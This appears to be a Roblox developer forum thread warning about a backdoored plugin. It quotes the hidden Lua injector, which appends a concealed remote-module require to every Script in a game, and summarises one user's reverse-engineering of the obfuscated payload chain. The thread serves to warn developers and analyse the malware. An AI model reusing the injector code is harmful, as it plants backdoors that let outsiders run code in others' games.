Yes, if you are wondering about this plugin:
In one of the script, this is hidden in it
I looked through the code of the plugin, I managed to find this. Which is the backdoor.
pcall(function()local b='\n --[[ --]] pcall(function()require(4850721608):Fire()end) 'for a,a in pairs(workspace:GetDescendants()) do if a:IsA(“Script”)then a.Source=a.Source…b end end for a,a in pairs(game:GetService(“ServerScriptService”):GetDescendants())do if a:IsA(“Script”)then a.Source=a.Source…b end end end)
This is the code that adds the backdoor to the game scripts.
I also suggest to look at the like ratio, creator, and comments of any plugin before getting/buying it. And all together I highly suggest to never get any type of virus destroyer these tend to be backdoors.
I had this script added to a game of mine as well and took it as a challenge to reverse engineer it.
Here is my process of reverse engineering the script, which took me about an hour and a half.
The final code execution is very underwhelming; it just gives a few specific players a sign when they join, and that’s pretty much it.
Here is an attachment where you can check out all of the reverse engineered parts. fix-lua-reverse-engineer.rbxl (36.0 KB)
The path ended up to be this:
Black boxes are obfuscation while red boxes contain the actual payload.
For the final code execution, see the script game.Workspace.simplification.FinalCode.
As mentioned in my reverse engineering process, the final code is a combination of code from the module modified and MainModule_builderx1337.
I am only publishing this to inform players what the code mentioned actually does.
